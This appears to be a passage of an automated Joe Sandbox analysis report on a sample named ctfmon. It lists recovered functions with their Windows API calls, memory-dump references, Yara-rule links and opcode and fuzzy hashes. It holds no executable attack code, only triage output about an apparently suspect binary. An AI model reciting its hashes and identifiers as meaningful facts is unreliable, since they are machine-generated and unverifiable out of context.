SelectObject.GDI32(00000000,?), ref: 0041D0DE
OffsetRect.USER32(?,?,00000000), ref: 0041D134

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
String ID:
API String ID: 2215177122-0
Opcode ID: 4307d82b0b8a792f120d9466698bca061e3411348b88fecfdab8711ea9572030
Instruction ID: 4c5bc5c323774a5c2da63429ddb1a7b1421399ae9eef4e28febc03626f88aa8e
Opcode Fuzzy Hash: 4307d82b0b8a792f120d9466698bca061e3411348b88fecfdab8711ea9572030
Instruction Fuzzy Hash: EE817971604301AFC310DF68DC84EABB7E4FB89318F004A2EF94493291E775E94ACB96

Function 0041F7C0 Relevance: 12.2, APIs: 8, Instructions: 163COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,00000002), ref: 0041F7D3
SizeofResource.KERNEL32(?,00000000,?,76944920,00000000,7693CF90,?,?,?,?,?,?,?,?,0041D411,00000001), ref: 0041F7ED
LoadResource.KERNEL32(?,00000000,?,76944920,00000000,7693CF90,?,?,?,?,?,?,?,?,0041D411,00000001), ref: 0041F7F7

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Resource$FindLoadSizeof
String ID:
API String ID: 507330600-0
Opcode ID: 246115ffcb21acfb6b612898e6a96047005db1a3dcca2133cc8e3dd41b22750f
Instruction ID: 9f6e833ce4930495a174d37efbb73787bb1f77972dd9fa55e7fbf6b8b2689a6a
Opcode Fuzzy Hash: 246115ffcb21acfb6b612898e6a96047005db1a3dcca2133cc8e3dd41b22750f
Instruction Fuzzy Hash: 6C41EF327042145BE70CCE299856AAF77D2EBC9350F448A3EF946C3381DF75950AC3A5

Function 0042585B Relevance: 12.1, APIs: 8, Instructions: 72stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00425860
GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 0042587E
lstrcpynW.KERNEL32(?,?,00000104), ref: 0042588D
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004258C1
CharUpperW.USER32(?), ref: 004258D2
FindFirstFileW.KERNEL32(?,?), ref: 004258E8
FindClose.KERNEL32(00000000), ref: 004258F4
lstrcpyW.KERNEL32(?,?), ref: 00425904

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: eb2e77227feee21f3809df92a7e21bbd02d509cfcaef561014312a0744f67c22
Instruction ID: dc0638b164661f47167565fae3824bc1416e181e3646228fdecd816abe73c54b
Opcode Fuzzy Hash: eb2e77227feee21f3809df92a7e21bbd02d509cfcaef561014312a0744f67c22
Instruction Fuzzy Hash: 7F2192B1A00529EBCB20AF65EC48AEF7F7CFF05764F408126F819D2160D7348A46CBA4

Function 004013E0 Relevance: 9.1, APIs: 6, Instructions: 73windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00424368: ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376

IsIconic.USER32(?), ref: 004013F1

Part of subcall function 004267B7: __EH_prolog.LIBCMT ref: 004267BC
Part of subcall function 004267B7: BeginPaint.USER32(?,?,?,?,0040140B), ref: 004267E5

SendMessageW.USER32(?,00000027,?,00000000), ref: 00401422
GetSystemMetrics.USER32(0000000B), ref: 00401430
GetSystemMetrics.USER32(0000000C), ref: 00401436
GetClientRect.USER32(?,?), ref: 00401443
DrawIcon.USER32(?,?,?,?), ref: 00401478

Part of subcall function 00426829: __EH_prolog.LIBCMT ref: 0042682E
Part of subcall function 00426829: EndPaint.USER32(?,?,?,?,00401487), ref: 0042684B

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSendShowWindow
String ID:
API String ID: 744365313-0
Opcode ID: 1e23e38091298bc23035b615d3f8958f05cf2239797f5dc484b3318349e7e02d
Instruction ID: 3cd01a1e54c5f11bb01f4eb2d2d637b62c3ac8db24f719d817f91ceb89e6c8c0
Opcode Fuzzy Hash: 1e23e38091298bc23035b615d3f8958f05cf2239797f5dc484b3318349e7e02d
Instruction Fuzzy Hash: F0118E713043155FC214EF38DC89E6F77A9EBC8308F444A29B585C3290DA74E80A8B55

Function 00405FAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84filestringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(-0000002C,?,76228FB0,00000000,00000000,00403769,*.*,00000000), ref: 00405FD9
FindFirstFileW.KERNEL32(?,?), ref: 00405FE3
GetLastError.KERNEL32 ref: 00405FF1
SetLastError.KERNEL32(0000007B,000000FF,00000000,?), ref: 0040603C

Part of subcall function 00424A36: lstrlenW.KERNEL32(?,00000000,00406084,000000FF,?,?,?,?,?,00000000,?), ref: 00424A49

Strings

*.*, xrefs: 00405FCF, 00405FD7, 00405FE2

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorLast$FileFindFirstlstrcpylstrlen
String ID: *.*
API String ID: 334723784-438819550
Opcode ID: 0eb3c0ce6568269592c83524268b6381258269ac00d58bd2e77033d507aac4d6
Instruction ID: 5172b66741902352c281ddeba33db5bac7263c07da9d21b6aa86c91882e6205b
Opcode Fuzzy Hash: 0eb3c0ce6568269592c83524268b6381258269ac00d58bd2e77033d507aac4d6
Instruction Fuzzy Hash: 78214B72A407019BE730BB719C85E2BB298DF54764F110A3FF522B62C2EB7D8C018669

Function 004235E7 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E

GetKeyState.USER32(00000010), ref: 0042360B
GetKeyState.USER32(00000011), ref: 00423614
GetKeyState.USER32(00000012), ref: 0042361D
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00423633

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: f08a36ac8abab3e89e4425618160d51b63b8717b140772f1c211ae5f2a27efec
Instruction ID: 218882e5c383a6313f97fdf1e6bc22957306ce5396ae17cae6112ddc5d99c2e4
Opcode Fuzzy Hash: f08a36ac8abab3e89e4425618160d51b63b8717b140772f1c211ae5f2a27efec
Instruction Fuzzy Hash: 26F0BE377403A936E5303AA22C42FAA81384B90FD6F80042AB701AA2D28D9D8943467C

Function 00405B9B Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

MonitorFromWindow.USER32(?,?), ref: 00405BB0

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: FromMonitorWindow
String ID:
API String ID: 721739931-0
Opcode ID: 0ba1fc86d451cd674b8620c5ae4f720fa838888ad4e6d9ad1c3c2af6160355b6
Instruction ID: 27bb940a1f3bd50fed2c6d6a608dacda6c6e613f901876cb4841b3324aa04d70
Opcode Fuzzy Hash: 0ba1fc86d451cd674b8620c5ae4f720fa838888ad4e6d9ad1c3c2af6160355b6
Instruction Fuzzy Hash: C4F03131204609ABDF119F61CC499AF3BB8EF00344B548436FC15F51A0DB78EA55DF59

Function 00414AE8 Relevance: 4.7, APIs: 3, Instructions: 207timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5

Part of subcall function 004125DE: LeaveCriticalSection.KERNEL32(?,0040E217,00000009,0040E203,00000000,?,00000000,00000000,00000000), ref: 004125EB

GetTimeZoneInformation.KERNEL32(0000000C,00000000,0000000C,?,0000000B,0000000B,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000,00000001), ref: 00414B36
WideCharToMultiByte.KERNEL32(00000220,0053F9C4,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00414BCC
WideCharToMultiByte.KERNEL32(00000220,0053FA18,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00414C05

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
String ID:
API String ID: 3442286286-0
Opcode ID: aac624340af3ebf17a977342e7469023fb5b1538da0d99a694fe3e54f7e6ed47
Instruction ID: 48f4ca70aef0641f6a7985dd11d64af3c1749ff9a8629de9f8af13e7c0a6b540
Opcode Fuzzy Hash: aac624340af3ebf17a977342e7469023fb5b1538da0d99a694fe3e54f7e6ed47
Instruction Fuzzy Hash: F961F571904150AFDB219F29EC42BE63BA5E782314F24513FE284973E1D7B849C29B9D

Function 00420782 Relevance: 4.5, APIs: 3, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 004207A9
GetKeyState.USER32(00000011), ref: 004207B2
GetKeyState.USER32(00000012), ref: 004207BB

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 2f6419a2dddfb4d1a28dc0e12c4fc165ddb708ff50ba0677f42bd9c75a4199f1
Instruction ID: f4ac4529b9722813b7d67fd19f5cdbe002d1c3b3255552e6b50f59c26b2fec3d
Opcode Fuzzy Hash: 2f6419a2dddfb4d1a28dc0e12c4fc165ddb708ff50ba0677f42bd9c75a4199f1
Instruction Fuzzy Hash: E0E06535702269DDEA505250AD44FA567D05F80F94F808497E684AB097CAB8B842DF69

Function 004140F6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000140B0), ref: 004140FB

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 366c4fb960b85c2e92b2bea7ad6ad634cd9710ba745c8f2d91dedbc209867883
Instruction ID: f1ff27b7916b2cce631cc1a557f075b00fa1526ff6cad74bdb84531a931c4cae
Opcode Fuzzy Hash: 366c4fb960b85c2e92b2bea7ad6ad634cd9710ba745c8f2d91dedbc209867883
Instruction Fuzzy Hash: A8A022FAA8A2008B83208F20BC0A3083EA0B2883023008033E80080330CB300000AF2E

Function 00414108 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0041410D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c081741ae02d8cb9fc3fe6e60ab96c73a027c458e2d34c0bfccc6886e0d337f1
Instruction ID: dd4f498f1e2aac16624c323be649f155b6b708a99a262030bc333f91d3ecbafa
Opcode Fuzzy Hash: c081741ae02d8cb9fc3fe6e60ab96c73a027c458e2d34c0bfccc6886e0d337f1
Instruction Fuzzy Hash:

Function 004188E0 Relevance: .8, Instructions: 813COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d2d708561d6972fe9b309b4addc8bbea1b0bac5f5c1817c0a3542f0aa82c15
Instruction ID: db3412e87bc0fbacba2cc52aabc5694b2b7dc5964e815c9b5da4f2738e772d69
Opcode Fuzzy Hash: b6d2d708561d6972fe9b309b4addc8bbea1b0bac5f5c1817c0a3542f0aa82c15
Instruction Fuzzy Hash: D9625F74600B018FD734CF19D990AA7B7E2EF95710B144A2EE88687B51DB34FC86CB65

Function 0041B310 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
Instruction ID: a6df442306ba8a4dfabb8f5a196b79691c35f75c2b15b1fc05cb6d8271a1422f
Opcode Fuzzy Hash: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
Instruction Fuzzy Hash: 63F1A0765092408FC309CF18D4989E2BBE6EF98714F1F82FEC4599B362D3369981CB95

Function 00419C60 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f69cb2e3e429f83e438e39c9d8bf7617ce01c0b10c237f74658f4d2a52fb2f6
Instruction ID: 69cc6d32e20112f50dc792a520a733575006adad840aea48e66f089e357589c8
Opcode Fuzzy Hash: 5f69cb2e3e429f83e438e39c9d8bf7617ce01c0b10c237f74658f4d2a52fb2f6
Instruction Fuzzy Hash: F8E12675600B018FD329CF29C990AA7B7E2BF89304B58892ED9D787B51D735F882CB45

Function 004196B0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb64c443ab7e783f8eea725965ac47a0914f086a44cb6f0de9022562112617b
Instruction ID: d36bd19848220be26b27225da97ef841b32e4fcccd14377bcdabf79b971b2156
Opcode Fuzzy Hash: 6bb64c443ab7e783f8eea725965ac47a0914f086a44cb6f0de9022562112617b
Instruction Fuzzy Hash: 8AB13976214B418FC328DF29C9A09A7B3E2BF89304B18892ED597C7B51D735F881CB49

Function 0041B890 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15325b2f067a5f149b17b86ebc0ca50656abf31d02fd38b4e25d355ebc85a566
Instruction ID: 7796cbec15bd05dc3979ce63851c4ecb7f4ba1e90501db5deab1b6de846e4272
Opcode Fuzzy Hash: 15325b2f067a5f149b17b86ebc0ca50656abf31d02fd38b4e25d355ebc85a566
Instruction Fuzzy Hash: FED178756092518FC319CF18D4D88E27BE5EF98700B1E82FDC9898B323D7319981CB99

Function 00413595 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: ed1c1f8a0473429884b12b6c18174f26900eaea0c8f50ff17363cd7a291bb6b7
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: 54B17FB590020ADFDB15CF04C5D0AE9BBA1BF58319F14C1AED85A5B382C735EE86CB94

Function 0041A100 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
Instruction ID: bfb1cc0ea4169eae0f8b60db0e39e4e80a134d46bfd7a75976ba22cab59c3b7f
Opcode Fuzzy Hash: dca000b2f6927503bda9435cdfa2d38ec8c2434b44ad82a88198043659fe7c76
Instruction Fuzzy Hash: D2715033755A8207EB2DCE3E8C602FBABD34FC522472EC87E94DAC7756EC6994165204

Function 0041BF10 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

